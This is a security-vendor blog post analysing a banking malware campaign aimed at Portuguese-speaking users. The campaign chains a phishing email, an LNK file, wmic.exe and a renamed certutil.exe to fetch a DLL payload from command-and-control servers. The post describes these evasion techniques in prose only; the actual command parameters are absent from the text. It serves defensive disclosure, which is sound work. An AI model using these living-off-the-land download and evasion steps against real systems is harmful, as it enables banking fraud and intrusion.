by Byron Gelera and Donald Castillo
We recently found a malware that abuses two legitimate Windows files — the command line utility wmic.exe and certutil.exe, a program that manages certificates for Windows — to download its payload onto the victim’s device. What’s notable about these files is that they are also used to download other files as part of its normal set of features, making them susceptible to abuse for malicious purposes.
Although the WMIC and CertUtil have been used in malware campaigns before, this attack integrates both files into its routine and adds even more anti-evasion layers. This indicates that the cybercriminals behind this attack are evolving their tools and techniques for greater stealth and effectivity.
Figure 1: Infection Chain for the attack
Analysis of the routine
The attack starts with a malicious email, seemingly from the company that operates the national postal service of Brazil, notifying the target recipient of an unsuccessful delivery attempt. It then mentions that the details (including the tracking code) of the delivery can be accessed via an embedded link.
Figure 2: The email containing the malicious link
Once the recipient clicks on the embedded link, it will open a browser window that will then prompt the user to download a ZIP file. Once the zip file is downloaded and extracted, the user will be presented with an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM). The LNK file will then point to cmd.exe using the following parameter:
The cmd.exe is responsible for executing wmic.exe via the following parameter:
Doing this will allow wmic.exe to download and execute script commands from a Command-and-Control (C&C) server. This will create a copy of certutil.exe in the %temp% folder with a different name: certis.exe. This step in the routine is most likely performed as an additional evasion technique since, as mentioned earlier, the use of certutil.exe in malicious attacks is already publicly known.
The next step in the routine involves a script that will command certis.exe to download files from a new set of C&C servers, which are received from the first download URL.
One of the downloaded files is the main payload — a DLL file (detected as TSPY_GUILDMA.C) that will be executed using regsvr32.exe. The other files downloaded from the C&C server are used as a module for the main payload’s routine.
Our analysis of the payload shows that it is a banking malware that only works when the target’s language is set to Portuguese, which means it’s likely designed to target users in Portugal and/or Brazil, which are both Portuguese-speaking countries.
Best practices to defend against this attack
The use of legitimate files to add additional evasion layers is a common tactic of cybercriminals, posing problems for some security solutions that struggle to distinguish legitimate use from malicious ones.
However, users can prevent this attack from moving past its initial stage by implementing best practices for email security. This includes:
Trend Micro Solutions
Enterprises can take advantage of Trend Micro endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free Business Security. Both solutions protect users and businesses from threats by detecting malicious files and spammed messages, and blocks all related malicious URLs. Trend Micro Deep Discovery has a layer for email inspection that can protect enterprises by detecting malicious attachment and URLs. Deep Discovery can detect the remote scripts even if it is not being downloaded in the physical endpoint.
Trend Micro Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. Additionally, Trend Micro Anti-Spam Engine detects and blocks malicious IQY files without using signatures. Trend Micro Email Reputation Services detects the spam mail used by this threat upon arrival.
Trend Micro OfficeScan with XGen endpoint security infuses high-fidelity machine learningwith other detection technologies and global threat intelligence for comprehensive protection against advanced malware.
Indicators of Compromise (IoCs)
Detected as Trojan.LNK.DLOADR.AUSUJM (LNK file)
Detected as TSPY_GUILDMA.C (DLL file)
The post Malware Targeting Brazil Uses Legitimate Windows Components WMI and CertUtil as Part of its Routine appeared first on .